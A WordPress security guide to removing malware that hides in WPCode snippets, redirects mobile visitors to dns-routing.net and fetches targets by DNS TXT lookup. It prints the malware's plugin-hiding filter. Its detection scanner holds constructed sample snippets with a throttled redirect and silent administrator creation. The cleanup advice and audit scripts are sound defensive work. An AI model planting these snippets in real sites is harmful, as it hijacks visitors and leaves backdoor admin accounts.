
How To Remove DNS-Routing.net Malware in WordPress

This post covers a specific piece of malware that targets WordPress sites through the WPCode plugin (formerly called Insert Headers and Footers; its plugin folder is still named insert-headers-and-footers). It redirects visitors to dns-routing.net and uses several techniques to avoid detection. We will walk through recognising the symptoms, understanding how it works, and removing it from your site.

Identifying the Malware

1. Recognizing the Symptoms

One of the first signs of this malware is unusual behaviour on your WordPress site, such as sporadic redirects. Visitors may be redirected to the dns-routing.net domain with a seemingly random path appended. The redirects are infrequent by design (they fire at most once per IP address per day and only for certain visitors, as described below), so an administrator reloading the site from the same connection will rarely see one. When testing, use a connection you have not visited the site from recently and a mobile user agent, and watch the browser's network tab for a request to dns-routing.net.

2. Understanding the Malware's Mechanism

This malware combines several techniques, using the WPCode (Headers and Footers) plugin to carry out its malicious activities:

  • Domain Routing and TXT Lookups: The malware sends traffic through dns-routing.net and uses DNS TXT lookups against cdn-routing.com to fetch its configuration. The TXT records hold destination domains encoded in Base64; the snippet decodes them at request time to decide where a visitor is sent. Because the destination never appears in the stored code, searching the database for a known bad domain will miss it, and the operators can change targets without touching the site.
  • Conditional Redirects: The redirect fires only when conditions such as the visitor's IP address and device type (for example a mobile or iPhone user agent) are met, and at most once every 24 hours per IP address. Both checks reduce the chance that a site owner or a scanner ever sees the redirect.
  • Admin User Creation: The same snippet can create additional administrator accounts by calling WordPress's own user-creation functions. Because the code lives in the database rather than in a file, scanners that only inspect wp-content or compare files to known-good copies do not see it; it is the WPCode plugin's normal ability to run stored PHP that makes this possible.
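The traits listed above are enough to scan for. The following Python script is an added example (not code from the original page, WPCode or WordPress); it scans rows exported from the wp_posts table, where WPCode keeps its snippets with post_type 'wpcode', and scores each snippet against the indicators described above: a DNS TXT lookup, Base64 decoding, a redirect, checks on the visitor's IP or user agent, a 24-hour throttle, the all_plugins hiding filter and administrator creation. The indicator names, the scoring thresholds and the sample rows are my own constructions for the demo.

```python
import re
from dataclasses import dataclass, field

# Added example, not code from the page. Row dictionaries mirror wp_posts columns;
# WPCode stores snippets with post_type = 'wpcode' and post_status = 'publish' when
# active. Indicator names and weights are assumptions chosen for this demo.
INDICATORS = {
    "dns_txt_lookup":     re.compile(r"dns_get_record\s*\([^)]*DNS_TXT", re.I),
    "base64_decode":      re.compile(r"base64_decode\s*\(", re.I),
    "redirect":           re.compile(r"wp_redirect\s*\(|header\s*\(\s*['\"]Location:", re.I),
    "client_fingerprint": re.compile(r"\$_SERVER\s*\[\s*['\"](?:REMOTE_ADDR|HTTP_USER_AGENT|HTTP_X_FORWARDED_FOR)['\"]", re.I),
    "device_check":       re.compile(r"iphone|android|mobile", re.I),
    "daily_throttle":     re.compile(r"\b(?:86400|DAY_IN_SECONDS)\b"),
    "hide_plugin":        re.compile(r"add_filter\s*\(\s*['\"]all_plugins['\"]", re.I),
    "admin_creation":     re.compile(r"wp_insert_user\s*\(|wp_create_user\s*\(|set_role\s*\(\s*['\"]administrator['\"]", re.I),
}
# Any one of these is damning on its own in a snippet the site owner did not write.
HIGH_SEVERITY = {"dns_txt_lookup", "hide_plugin", "admin_creation"}
# Weaker traits only flag when several co-occur (redirect + fingerprint + throttle
# is exactly the combination this malware uses).
MIN_SCORE = 3


@dataclass
class Finding:
    snippet_id: int
    title: str
    active: bool
    hits: list = field(default_factory=list)

    @property
    def score(self):
        return sum(2 if h in HIGH_SEVERITY else 1 for h in self.hits)

    @property
    def flagged(self):
        return bool(HIGH_SEVERITY & set(self.hits)) or self.score >= MIN_SCORE


def scan_snippet(row):
    """Return a Finding for one wp_posts row of post_type 'wpcode'."""
    code = row["post_content"]
    hits = [name for name, rx in INDICATORS.items() if rx.search(code)]
    return Finding(row["ID"], row["post_title"], row["post_status"] == "publish", hits)


def scan_snippets(rows):
    """Scan every WPCode row; return only the flagged findings, worst first.
    Inactive ('draft') snippets are scanned too: they can be switched on later."""
    findings = [scan_snippet(r) for r in rows if r.get("post_type") == "wpcode"]
    return sorted((f for f in findings if f.flagged), key=lambda f: -f.score)


# Constructed sample export: one legitimate snippet and two modelled on the
# behaviour described in this post (not real captured malware).
SAMPLE_ROWS = [
    {"ID": 12, "post_type": "wpcode", "post_status": "publish", "post_title": "GA tag",
     "post_content": "add_action('wp_head', function () { echo '<script async src=\"https://www.googletagmanager.com/gtag/js\"></script>'; });"},
    {"ID": 57, "post_type": "wpcode", "post_status": "publish", "post_title": "",
     "post_content": (
         "add_filter('all_plugins', function($p){ unset($p['insert-headers-and-footers/ihaf.php']); return $p; });"
         "add_action('init', function(){"
         " $ip = $_SERVER['REMOTE_ADDR']; if (get_transient('r_'.md5($ip))) return;"
         " if (stripos($_SERVER['HTTP_USER_AGENT'], 'iPhone') === false) return;"
         " $txt = dns_get_record('cdn-routing.com', DNS_TXT);"
         " $dst = base64_decode($txt[0]['txt']); set_transient('r_'.md5($ip), 1, 86400);"
         " wp_redirect('https://dns-routing.net/'.$dst); exit; });")},
    {"ID": 58, "post_type": "wpcode", "post_status": "draft", "post_title": "",
     "post_content": "add_action('init', function(){ if (!username_exists('wp-support')) { $id = wp_insert_user(['user_login'=>'wp-support','user_pass'=>'x']); (new WP_User($id))->set_role('administrator'); } });"},
]

if __name__ == "__main__":
    for f in scan_snippets(SAMPLE_ROWS):
        state = "ACTIVE" if f.active else "inactive"
        print(f"snippet {f.snippet_id} ({state}) score={f.score}: {', '.join(f.hits)}")
```

Feed it the real rows with a query such as `SELECT ID, post_type, post_status, post_title, post_content FROM wp_posts WHERE post_type = 'wpcode'` (adjust the table prefix). The benign analytics snippet scores zero, the redirect snippet hits seven indicators, and the inactive admin-creation snippet is still reported because a single high-severity indicator is enough.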

3. Hidden Plugins and Malicious Code

The attackers abuse the legitimate WPCode plugin rather than exploiting a flaw in it: however they first gained access, they store their PHP as a WPCode snippet, which the plugin runs on every request. They then use that code to remove the plugin from the WP Admin > Plugins list, so nobody notices that WPCode is installed and active, and the malware persists undetected.

Here's an example of the malicious code:

// Runs inside a stored WPCode PHP snippet, so it executes on every request
// without any file on disk. 'insert-headers-and-footers/ihaf.php' is WPCode's
// own plugin path, so the plugin hosting the snippet vanishes from the list.
add_filter('all_plugins', function($plugins) {
    unset($plugins['insert-headers-and-footers/ihaf.php']);
    return $plugins;
});

This snippet hides the WPCode plugin from view while the malware keeps control of the site by executing the code stored in the database. Note that the all_plugins filter only changes what the Plugins screen displays: the plugin stays installed and active, its folder is still present in wp-content/plugins, and its entry remains in the active_plugins option. Comparing the folders on disk with the list shown in the admin panel is therefore a quick way to spot this trick.

Cleaning Up the Malware

If you suspect this malware is on your site, follow these steps to remove it:

1. Rename the Plugin Folder

To stop the malware from hiding the WPCode plugin, open the wp-content/plugins directory via SFTP/FTP or your hosting control panel and rename the insert-headers-and-footers folder to something like insert-headers-and-footers-2.

Note: The filter hard-codes the plugin path insert-headers-and-footers/ihaf.php, so after the rename it no longer matches and the plugin becomes visible again in the WP Admin panel. WordPress also deactivates a plugin whose path no longer exists, which means that until you reactivate it under the new folder name none of the WPCode snippets, malicious or legitimate, run.

2. Re-enable the Plugin and Disable the Malicious Code

After renaming the folder, go to your WP Admin area, activate the plugin again from the Plugins screen, then navigate to Code Snippets > Code Snippets. Deactivate and then delete the snippet the malware added, and go through every other snippet as well, including inactive ones, since an inactive snippet can simply be switched back on later. Keep a copy of the malicious code for your own records before deleting it.

Caveat: reactivating the plugin runs every active snippet again, including the malicious one, until you deactivate it. If even a brief window is unacceptable, deactivate the snippets directly in the database first. WPCode stores its snippets in the wp_posts table with post_type 'wpcode'; an active snippet has post_status 'publish' and an inactive one 'draft', so setting the malicious rows to 'draft' (via phpMyAdmin or WP-CLI) before you reactivate the plugin keeps them from running.

3. Remove the Plugin

Once you've disabled and deleted the malicious snippets, delete the plugin itself (listed as WPCode, or "Insert Headers and Footers" on older installs) from your WordPress site. This removes the vector the attackers used to maintain their presence. If the site genuinely relies on WPCode for legitimate snippets, you can keep it, but only after reviewing every snippet and reinstalling the plugin from a fresh copy. Remember that the snippets live in the database, not in the plugin folder, so delete them from the Code Snippets screen (including any in the trash) rather than assuming that removing the plugin takes them with it.

4. Reset Admin Passwords and Review Users

Change all administrator passwords so the attackers can't log back in with credentials they may have captured. Review your list of administrators and remove any account you don't recognise; compare each user's registration date with the time the redirects started, since the malware can create administrators silently. Also rotate the secret keys and salts in wp-config.php (AUTH_KEY, SECURE_AUTH_KEY and the rest), which invalidates every existing login cookie, including any session the attackers may still hold.

5. Update Everything

Make sure all plugins, themes, and WordPress core files are up-to-date. Regular updates help close vulnerabilities that could be exploited by malware.

6. Final Checks

After completing these steps, conduct a thorough review of your site to ensure it's clean: confirm that the plugin list in WP Admin matches the folders in wp-content/plugins, that no rows with post_type 'wpcode' remain in wp_posts that you did not create, and that the administrator list is the one you expect. Consider running a full site scan with a reputable security plugin that checks the database as well as the filesystem, since this malware's code lives in the database rather than in files.
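The user review in step 4 is easy to get wrong by hand because roles are not in wp_users at all: they sit in wp_usermeta as a PHP-serialized array under the key "<table prefix>capabilities". The script below is an added example (not code from the original page or from WordPress) that takes rows exported from wp_users and wp_usermeta, extracts the roles, and lists every administrator together with the reasons it deserves a look: a login the owner does not vouch for, or a registration date after the redirects were first noticed. The sample rows, the suspected-compromise date and the allowlist are constructed for the demo.

```python
import re
from datetime import datetime

# Added example for the "review users" step; not code from the page or WordPress.
# Input rows mirror the wp_users and wp_usermeta tables. Roles live in usermeta
# under "<prefix>capabilities" as a PHP-serialized array, e.g.
#   a:1:{s:13:"administrator";b:1;}
# so the prefix passed in must match $table_prefix in wp-config.php.
ROLE_RX = re.compile(r's:\d+:"([A-Za-z0-9_\-]+)";b:1;')
WP_TIME = "%Y-%m-%d %H:%M:%S"   # format of wp_users.user_registered


def roles_from_capabilities(serialized):
    """Return the role names switched on in a serialized wp_capabilities value."""
    return set(ROLE_RX.findall(serialized or ""))


def audit_admins(users, usermeta, known_admins, suspected_since, prefix="wp_"):
    """List every administrator with the reasons it should be reviewed.

    known_admins:    logins the site owner vouches for (assumed allowlist).
    suspected_since: earliest time the redirects were noticed, WP timestamp format.
    An empty reasons list means the account is expected.
    """
    cap_key = f"{prefix}capabilities"
    caps = {m["user_id"]: m["meta_value"] for m in usermeta if m["meta_key"] == cap_key}
    cutoff = datetime.strptime(suspected_since, WP_TIME)
    report = []
    for u in users:
        if "administrator" not in roles_from_capabilities(caps.get(u["ID"])):
            continue
        reasons = []
        if u["user_login"] not in known_admins:
            reasons.append("login not in the known admin list")
        if datetime.strptime(u["user_registered"], WP_TIME) >= cutoff:
            reasons.append("registered after the redirects started")
        report.append({"ID": u["ID"], "user_login": u["user_login"],
                       "user_email": u["user_email"], "reasons": reasons})
    return report


# Constructed sample rows for a site using the default "wp_" table prefix.
SAMPLE_USERS = [
    {"ID": 1, "user_login": "owner",      "user_email": "owner@example.com",   "user_registered": "2021-03-02 10:15:00"},
    {"ID": 2, "user_login": "editor1",    "user_email": "ed@example.com",      "user_registered": "2022-06-14 08:00:00"},
    {"ID": 9, "user_login": "wp-support", "user_email": "support@example.net", "user_registered": "2024-11-20 03:41:17"},
]
SAMPLE_USERMETA = [
    {"user_id": 1, "meta_key": "wp_capabilities", "meta_value": 'a:1:{s:13:"administrator";b:1;}'},
    {"user_id": 2, "meta_key": "wp_capabilities", "meta_value": 'a:1:{s:6:"editor";b:1;}'},
    {"user_id": 9, "meta_key": "wp_capabilities", "meta_value": 'a:2:{s:10:"subscriber";b:1;s:13:"administrator";b:1;}'},
]

if __name__ == "__main__":
    for row in audit_admins(SAMPLE_USERS, SAMPLE_USERMETA, {"owner"}, "2024-11-19 00:00:00"):
        flag = "REVIEW" if row["reasons"] else "ok"
        print(f"{flag:6} {row['user_login']} <{row['user_email']}>: "
              f"{'; '.join(row['reasons']) or 'known admin'}")
```

Export the real rows with `SELECT ID, user_login, user_email, user_registered FROM wp_users` and `SELECT user_id, meta_key, meta_value FROM wp_usermeta WHERE meta_key LIKE '%capabilities'`, and pass the site's actual prefix: with the wrong prefix no capabilities match and the report is empty, which is a silent false negative rather than an all-clear.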

Malware that abuses plugins like WPCode to redirect visitors to dns-routing.net and fetches its targets through DNS TXT lookups on cdn-routing.com is a serious threat, mainly because nothing suspicious is written to disk and the redirect is throttled so that owners rarely see it. If you catch it early and clean up properly, you can get rid of it. Keep your site updated, use strong passwords, and review your admin accounts and code snippets regularly. If you think your site has been compromised, follow the steps above to clean it up.